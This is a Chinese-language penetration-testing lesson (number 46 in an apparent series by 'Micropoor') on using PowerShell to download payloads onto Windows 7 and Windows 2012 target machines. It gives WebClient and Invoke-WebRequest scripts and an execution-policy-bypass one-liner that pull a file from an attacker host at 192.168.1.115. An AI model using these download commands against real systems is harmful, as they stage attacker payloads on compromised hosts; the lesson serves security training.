# 第四十六课：powershell一句话下载payload

自 Windows7 以后内置了 powershell，如Windows 7 中内置了 PowerShell2.0, Windows 8 中内置了 PowerShell3.0。

**靶机：windows 7** powershell $PSVersionTable\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJws29lRjQ8mCK-EKF%2F07fa8437a844c082c950d5643c994ef1.jpg?generation=1551060434619958\&alt=media)

## down.ps1:

基于System.Net.WebClient\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJws2BeDL-vi0eK2Uy%2Fc539c15cfe12c5ae4c5846e6b5a485b3.jpg?generation=1551060431344587\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJws2D0sDdfUgLDRcP%2F8772baf3212d72078525abfa44923db1.jpg?generation=1551060448862323\&alt=media)

## 附：

```
$Urls = @()
$Urls += "http://192.168.1.115/robots.txt"
$OutPath = "E:\PDF\" 
ForEach ( $item in $Urls) {
$file = $OutPath + ($item).split('/')[-1]
(New-Object System.Net.WebClient).DownloadFile($item, $file) 
}
```

**靶机：windows 2012** powershell $PSVersionTable\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJws2F57MTVEmLMB0z%2Feaa0bd3c317ef0ae922676a353c59f15.jpg?generation=1551060442332445\&alt=media)

## down.ps1:

在 powershell 3.0以后，提供 wget 功能，既 Invoke-WebRequest\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJws2HVXHzfWEADw32%2F218c38bbb622f9c8a2634cc1c1a713c3.jpg?generation=1551060445932526\&alt=media)

`C:\inetpub>powershell C:\inetpub\down.ps1`\
注：需要绝对路径。

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJws2JmQXDlm9AO8d8%2Fe6557dac203ad4ac9cc208f135f56307.jpg?generation=1551060433998329\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJws2LWFihFZnuFjHu%2F69ef693d770cee3f0a5bd9dfdee62f0a.jpg?generation=1551060424928813\&alt=media)

## 附：

```
$url = "http://192.168.1.115/robots.txt"
$output = "C:\inetpub\robots.txt"
$start_time = Get-Date
Invoke-WebRequest -Uri $url -OutFile $output
Write-Output "Time : $((Get-Date).Subtract($start_time).Seconds) second(s)"
```

**当然也可以一句话执行下载：**

```bash
powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://192.168.1.115/robots.txt','E:\robots.txt')
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJws2N_g2taTkxpf4J%2Fd40cd11aaad0632c0941441a31e3286f.jpg?generation=1551060446743083\&alt=media)

> Micropoor